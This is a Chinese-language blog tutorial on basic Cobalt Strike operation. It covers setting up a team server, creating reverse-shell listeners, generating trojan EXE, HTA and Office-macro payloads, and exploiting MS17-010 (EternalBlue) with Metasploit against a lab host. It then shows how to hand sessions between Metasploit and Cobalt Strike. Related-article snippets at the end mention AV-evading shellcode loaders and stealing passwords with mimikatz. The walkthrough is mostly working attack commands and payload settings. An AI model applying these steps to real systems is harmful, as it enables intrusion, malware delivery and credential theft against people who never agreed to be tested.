​Cobalt Strike基础使用

VSole2021-10-28 08:48:39

Cobalt Strike分为客户端组件和服务器组件,服务器的组件也是团队服务器,可以放在局域网或者公网下进行团队使用,也是Cobalt Strike社会工程功能的托管机器,团队服务器还可以存储由Cobalt Strike收集的数据,并且进行日志管理。

Cobalt Strike服务器必须在Linux系统上运行,这里演示服务器在Linux KALI端,本地进行Cobalt Strike客户端的连接。

CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包。

CS使用

启动CS服务端

启动客户端

服务端启动后客户端启动进行连接(团队多人连接将用户名设置为自己的用来区分团队成员)

主界面

CS功能使用(主机上线)

1.设置监听器用来接收会话

name:监听器名字

payload:payload类型

Host: shell反弹的主机,kali IP

Port: 反弹端口

这里Payload有9种选项,如下:

内部的Listener

windows/beacon_dns/reverse_dns_txt

windows/beacon_dns/reverse_http

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https 

windows/beacon_smb/bind_pipe

外部的Listener

windows/foreign/reverse_dns_txt

windows/foreign/reverse_http

windows/foreign/reverse_https

windows/foreign/reverse_tcp

Beacon为内置的监听器,在目标主机执行相应的payload,获取shell到cs上;其中包含DNS、HTTP、HTTPS等,Beacon可以选择通过DNS还是HTTP/S协议出口网络,甚至可以在使用Beacon通讯过程中切换HTTP和DNS。其支持多主机连接,部署好Beacon后提交一个要连回的域名或主机的列表,Beacon将通过这些主机轮询。目标网络的防护团队必须拦截所有的列表中的主机才可中断和其网络的通讯。通过种种方式获取shell以后(比如直接运行生成的exe),就可以使用Beacon了。

Foreign为外部结合的Listener,经常用于MSF的结合,例如获取meterpreter到MSF上。

2.生成木马

HTML Application 生成恶意的HTA木马文件;

MS Office Macro 生成office宏病毒文件;

Payload Generator 生成各种语言版本的payload;

Windows Executable 生成可执行exe木马;

Windows Executable(S) 生成无状态的可执行exe木马

生成后会保存到指定地方,通过某种方式上传到对方机器上,可以通过Webshell方式等这里不在讲解了

受害者运行exe文件我们的CS就直接上线了

这是生成exe文件,还可以生成宏病毒等上面介绍到的。

3.正常我们进去需要调整响应的时间,sleep 3 就行。

可以对我们上线的机器进行以下操作,也可以联动MSF进行使用

联动MSF使用

将MSF的会话转发到CS上

通过漏洞复现演示MSF获取目标Session

KALI:192.168.50.218

CS:192.168.50.130

受害者IP:192.168.50.185

1.发现漏洞

Nmap -A扫描目标开放了445端口

通过使用MSF辅助模块扫描发现存在ms17_010漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.50.185

exploit

查找漏洞利用模块

漏洞利用

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set RHOST 192.168.50.185

Run

获取后 我们background获取session

与CS联动,将会话转发到CS中

CS配置新建一个监听

KALI中配置

use exploit/windows/local/payload_inject

set payload windows/meterpreter/reverse_http

set DisablePayloadHandler true

set lhost 192.168.50.218 //KALI IP

set lport 4443 与CS同端口

set session 1

CS这边就接收到了MSF的会话

CS的会话转发到MSF中

由于生成的木马就是HTTP的,所以委派给msf时,监听器还是HTTP的

CS添加一个监听器

MSF准备

Use exploit/multi/handler

Set payload windows/meterpreter/reverse_http

Set lhost ip

Set lport ip

设置完成后我们就可以使用CS进行委派会话了

选中我们刚刚创建的就行

这样我们的MSF端就会获取到这个会话

CS还有非常多的功能,大家慢慢发现

beaconmsf
本作品采用《CC 协议》,转载必须注明作者和本文链接
CobaltStrike与MSF联动
2021-11-18 07:52:49
CobalStrike更适合做个稳控平台,轻型的远控工具,内置Windows系统类模块较多,Metasploit更擅长各类内网搜集和漏洞利用,包含多类型操作系统模块,但是使用起来“比较笨重”。
如果成功连接到管道, 使用WriteFile函数将shellcode数据写入已连接的命名管道。使用IDA分析检查导出函数:第一个是反射式DLL注入,限于篇幅,在本篇中不展开分析第二个是DLL的入口函数。在后续的文章中,会根据检测特征和csprofile的绕过按照专题进行分析。同时,大部分的CS检测特征都是在此。而在后续的文章分析中,将会着重的分析CS beacon中使用到的几种DLL注入方式;beacon config的检测;同时结合CS profile 的配置,研究一下CS的对抗检测方式。
SMB Beacon 与命名管道在 Windows 中,无管理员权限的情况下,即无法添加白名单。定义特定版本的协议的消息数据包集称为方言。进行身份验证后,用户可以访问服务器上不受共享级别安全性保护的所有共享。
然后设置host,port以及要传回去的session我们可以看到CS上返回了一个system权限的shell这个时候我们就可以愉快的使用mimikatz等工具来把administrator的密码偷来但是有的机器改了RDP服务的端口怎么办呢,我们可以用cs的进程管理,找到rdp服务的PID,然后在beacon中输入powershell?
2021年5月13日:c++ shellcode启动器,截至2021年5月13日,0/26完全未被检测到。在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!使用git clone存储库,生成命名为beacon.bin的shellcode文件,然后运行charlotte.py注:使用msfvenom -p测试以及CobaltStrike原始格式Payload!
WebServer特征本文简单介绍了Cobalt Stike 4.4版本的一些特征以及缓解措施。webser
但其实 Jboss 的这个路径可以查看到日志
前言 CobalStrike 与 Metasploit 均是渗透利器,各有所长。前者更适合做稳控平台,后者则更擅长内网各类探测搜集与漏洞利用。 两者更需要灵活的联动,各自相互依托,从而提升渗透的效率。 内置Socks功能 通过Beacon内置的socks功能在VPS上开启代理端口,打通目标内网通道,之后将本地Metasploit直接带入目标内网,进行横向渗透。 当然,也可以把代理设置在其他的
https://www.freebuf.com/sectool/389399.html
#默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true. #这里是当前获得的session的id. 可以看到 cs 成功接收到 shell右键 Interact 调出 beacon 界面,net view 查看当前域中计算机列表,然后执行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木马首先创建监听器用于木马回连,Host 为 cs 服务端的 ipAttacks->Packages->Windows Executable?需要派生的目标右击选择Spawn,然后创建一个?
VSole
网络安全专家